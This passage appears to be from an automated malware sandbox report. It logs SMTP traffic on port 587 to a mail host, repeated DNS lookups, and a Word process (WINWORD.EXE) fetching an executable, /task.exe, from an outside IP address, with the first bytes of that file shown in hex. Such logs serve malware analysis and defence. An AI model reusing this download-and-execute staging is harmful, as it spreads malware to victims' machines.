Nov 25, 2021 18:23:09.605180979 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.605192900 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.605494022 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.605505943 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.605732918 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.605746984 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.656527996 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.656563997 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.656591892 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.656708002 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.656725883 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.657040119 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.657242060 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.803112984 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.974106073 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:10.177432060 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:15.925235987 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:16.069926977 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.070209980 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.070223093 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.070466042 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:16.070491076 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:16.070552111 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:16.214948893 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.215959072 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.216047049 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.216077089 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.216195107 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:16.216533899 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:16.437278986 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:16.496520042 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:16.581340075 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:16.581487894 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:16.747162104 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:16.747487068 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:16.891659021 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:16.891685009 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:16.891992092 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.036999941 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.037527084 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.183504105 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.183830023 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.329072952 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.329498053 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.486474991 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.486887932 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.631376982 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.632114887 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.632467985 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.632813931 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.633291006 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.648902893 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.776782036 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.776842117 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.777367115 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.833313942 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.833364964 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.921262980 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.921327114 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.977564096 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.977583885 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:17.977616072 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:17.977658033 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.065476894 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.065500975 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.065677881 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.065720081 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.121895075 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.121917009 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.122047901 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.122111082 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.209840059 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.209990025 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.210002899 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.210087061 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.266357899 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.266380072 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.266633034 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.266765118 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.354314089 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.354334116 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.354347944 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.354482889 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.354511023 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.354590893 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.410914898 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.410938025 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.410959005 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.410969973 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.411142111 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.411258936 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.413652897 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.498781919 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.498800993 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.498809099 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.498955965 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.498959064 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.499027014 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.555458069 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.555500984 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.555659056 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.556044102 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.557949066 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.558073044 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.558106899 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.558178902 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.643090010 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.643245935 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.643300056 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.643382072 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.643589020 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.643702030 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.643714905 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.643825054 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.700396061 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.700418949 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.700427055 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.700627089 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.700654984 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.700737953 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.702222109 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.702284098 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.702374935 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.702451944 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.702553988 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.702621937 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.702744961 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.702802896 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.788044930 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788069963 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788078070 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788180113 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788214922 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.788289070 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.788419008 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788502932 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.788566113 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788642883 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.788736105 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788750887 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788866043 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.788917065 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.788991928 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.789062023 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.789139032 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.789259911 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.789453983 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.789464951 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.789525986 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.844968081 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.844994068 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.845098972 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.845160007 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.845341921 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.845545053 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.845868111 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.846594095 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.846676111 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.846826077 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.846909046 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.846913099 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:18.846920967 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.847093105 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.847126961 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932550907 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932591915 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932621002 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932796955 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932903051 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932939053 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.932965994 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933037043 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933187008 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933216095 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933387995 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933425903 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933604956 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933760881 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.933980942 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990179062 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990300894 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990329981 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990422010 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990602970 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990782022 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.990972996 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.991161108 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:18.991374016 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:19.153431892 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:23:19.366628885 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:23:22.003693104 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:22.151956081 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.152122021 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:22.322994947 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.323681116 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:22.471856117 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.471884966 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.472337961 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:22.621323109 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.670595884 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:22.820713997 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.827204943 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:22.976063967 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:22.983613014 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:23.147027016 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:23.151930094 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:23.300436974 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:23.304316044 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:23.304552078 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:23.304764032 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:23.304953098 CET	49175	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:23.452843904 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:23.452934027 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:23.551043034 CET	587	49175	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:23.812973022 CET	49175	587	192.168.2.22	208.91.198.143

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 18:22:16.367185116 CET	52167	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:22:16.400242090 CET	53	52167	8.8.8.8	192.168.2.22
Nov 25, 2021 18:22:26.332719088 CET	50591	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:22:26.365432024 CET	53	50591	8.8.8.8	192.168.2.22
Nov 25, 2021 18:22:38.933029890 CET	57805	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:22:38.971023083 CET	53	57805	8.8.8.8	192.168.2.22
Nov 25, 2021 18:23:06.768471956 CET	59030	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:23:06.805955887 CET	53	59030	8.8.8.8	192.168.2.22
Nov 25, 2021 18:23:16.268558025 CET	59185	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:23:16.389869928 CET	53	59185	8.8.8.8	192.168.2.22
Nov 25, 2021 18:23:16.390470982 CET	59185	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:23:16.436175108 CET	53	59185	8.8.8.8	192.168.2.22
Nov 25, 2021 18:23:21.923551083 CET	55616	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:23:21.961463928 CET	53	55616	8.8.8.8	192.168.2.22
Nov 25, 2021 18:23:21.962011099 CET	55616	53	192.168.2.22	8.8.8.8
Nov 25, 2021 18:23:21.999506950 CET	53	55616	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 18:22:16.367185116 CET	192.168.2.22	8.8.8.8	0x1bee	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:26.332719088 CET	192.168.2.22	8.8.8.8	0x8af0	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:38.933029890 CET	192.168.2.22	8.8.8.8	0xb28c	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:06.768471956 CET	192.168.2.22	8.8.8.8	0x2596	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.268558025 CET	192.168.2.22	8.8.8.8	0x1240	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.390470982 CET	192.168.2.22	8.8.8.8	0x1240	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.923551083 CET	192.168.2.22	8.8.8.8	0x6f32	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.962011099 CET	192.168.2.22	8.8.8.8	0x6f32	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 25, 2021 18:22:16.400242090 CET	8.8.8.8	192.168.2.22	0x1bee	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:16.400242090 CET	8.8.8.8	192.168.2.22	0x1bee	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:16.400242090 CET	8.8.8.8	192.168.2.22	0x1bee	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:16.400242090 CET	8.8.8.8	192.168.2.22	0x1bee	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET	8.8.8.8	192.168.2.22	0x8af0	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET	8.8.8.8	192.168.2.22	0x8af0	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET	8.8.8.8	192.168.2.22	0x8af0	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET	8.8.8.8	192.168.2.22	0x8af0	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET	8.8.8.8	192.168.2.22	0xb28c	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET	8.8.8.8	192.168.2.22	0xb28c	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET	8.8.8.8	192.168.2.22	0xb28c	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET	8.8.8.8	192.168.2.22	0xb28c	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET	8.8.8.8	192.168.2.22	0x2596	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET	8.8.8.8	192.168.2.22	0x2596	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET	8.8.8.8	192.168.2.22	0x2596	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET	8.8.8.8	192.168.2.22	0x2596	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET	8.8.8.8	192.168.2.22	0x1240	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET	8.8.8.8	192.168.2.22	0x6f32	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

173.232.204.89

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	173.232.204.89	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:21:19.760103941 CET	0	OUT	GET /task.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 173.232.204.89 Connection: Keep-Alive
Nov 25, 2021 18:21:19.907119036 CET	1	IN	HTTP/1.1 200 OK Server: nginx/1.19.9 Date: Thu, 25 Nov 2021 17:21:19 GMT Content-Type: application/octet-stream Content-Length: 504832 Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT Connection: keep-alive ETag: "619f6afa-7b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 